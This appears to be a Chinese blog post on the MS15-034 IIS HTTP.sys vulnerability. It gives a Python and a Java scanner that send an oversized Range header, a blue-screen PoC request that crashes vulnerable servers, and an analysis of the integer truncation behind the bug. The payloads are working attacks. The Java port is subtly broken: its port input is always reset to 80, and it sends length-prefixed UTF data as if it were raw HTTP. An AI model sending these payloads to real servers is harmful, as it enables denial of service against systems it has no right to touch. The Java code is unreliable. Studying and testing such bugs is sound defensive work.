零、MS15-034POC核心部分(參考巡風):
1 socket.setdefaulttimeout(timeout) 2 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 3 s.connect((ip, int(port))) 4 flag = "GET / HTTP/1.0\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n" 5 s.send(flag) 6 data = s.recv(1024) 7 s.close() 8 if 'Requested Range Not Satisfiable' in data and 'Server: Microsoft' in data: 9 print "vuln"
由於最近想學習java,所以修改了一版java的代碼:
1 /* 2 * encoding:utf-8 3 * Author:chenran01; 4 * Email:crsecscu@gmail.com 5 */ 6 7 //import lib packages 8 import java.net.Socket; 9 import java.util.Scanner; 10 import java.io.*; 11 12 //define main class 13 public class HTTPSYS{ 14 public static String IP_ADDR = "127.0.0.1"; 15 public static int PORT = 80; 16 public static String Flag = "GET / HTTP/1.0\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n"; 17 //Flag is the payload 18 public static void main(String[] args){ 19 System.out.print("Please input target IP:"); 20 Scanner input = new Scanner(System.in); 21 IP_ADDR = input.next(); 22 System.out.print("Please input target port:"); 23 try{ 24 PORT = System.in.read(); 25 }catch(Exception ex){ 26 System.out.printf("Error-Reason:%s",ex.toString()); 27 }finally{ 28 PORT = 80; 29 } 30 try{ 31 Socket socket = new Socket(IP_ADDR,PORT); 32 //創建socket 33 DataInputStream socketrecv = new DataInputStream(socket.getInputStream()); 34 DataOutputStream socketsend = new DataOutputStream(socket.getOutputStream()); 35 //創建輸入輸出對象 36 socketsend.writeUTF(Flag);//發送payload 37 String response_content = socketrecv.readUTF();//獲取回顯 38 if(response_content.indexOf("Server: Microsoft") != -1 && response_content.indexOf("Requested Range Not Satisfiable") != -1){ 39 System.out.print("有漏洞"); 40 }else{ 41 System.out.print("沒有漏洞"); 42 } 43 }catch(Exception ex){ 44 System.out.printf("Error-Reason:%s",ex.toString()); 45 } 46 47 48 } 49 }
一、MS15-034 HTTP.sys漏洞原理考證:
原理部分參考:http://www.ijiandao.com/safe/cto/12821.html
1 #舉例:藍屏POC 2 """ 3 GET /welcome.png HTTP/1.1 4 Host: PoC 5 Range: bytes=12345-18446744073709551615 6 """
這個地方的Range字段在IIS內部HTTP!UlBuildFastRangeCacheMdlChain(用於生成響應報文的緩存MDL鏈,來描述HTTP響應的狀態行、頭部與消息體。)這個函數中會調用一次nt! IoBuildPartialMdl函數來生成MDL鏈。這這個函數里,會計算length這個值:
注意這里明確要求了由VirtualAddress與Length確定的區間必須是SourceMdl描述的緩沖區的一個自區間,正是對此要求的違反導致了此漏洞中的內存破壞。
第3次調用nt! IoBuildPartialMdl來生成消息體MDL時的參數如下:
SourceMdl = 0xfffffa801a38cb60
SourceMdl.VirtualAddress = 0xfffffa801ac94000
SourceMdl.ByteCount = 0x2d315
SourceMdl.ByteOffset = 0x0
TargetMdl = 0xfffffa801a2ed580
TargetMdl.VirtualAddress = 0xfffffa801ac97000
TargetMdl.ByteCount = 0xffffcfc7
TargetMdl.ByteOffset = 0x39
VirtualAddress = 0xfffffa801ac97039
Length = 0xffffcfc7這里的Length是根據HTTP請求消息頭部中的Range字段計算得到的,過程如下:
首先,在HTTP!UlpParseRange中對Range字段進行解析,得到RangeBegin、RangeEnd;
然后,計算RangeLength = RangeEnd – RangeBegin + 1;
最后,將RangeLength截斷為32位得到Length。
以PoC中的Range: bytes=12345-18446744073709551615為例:
RangeBegin = 12345 = 0x3039
RangeEnd = 18446744073709551615 = 0xffffffffffffffff
RangeLength = 0xffffffffffffffff – 0x00003039 + 1 = 0xffffffffffffcfc7
Length = 0xffffcfc7
顯然由於Length超長而導致違反了nt! IoBuildPartialMdl的要求,進而造成內存破壞。
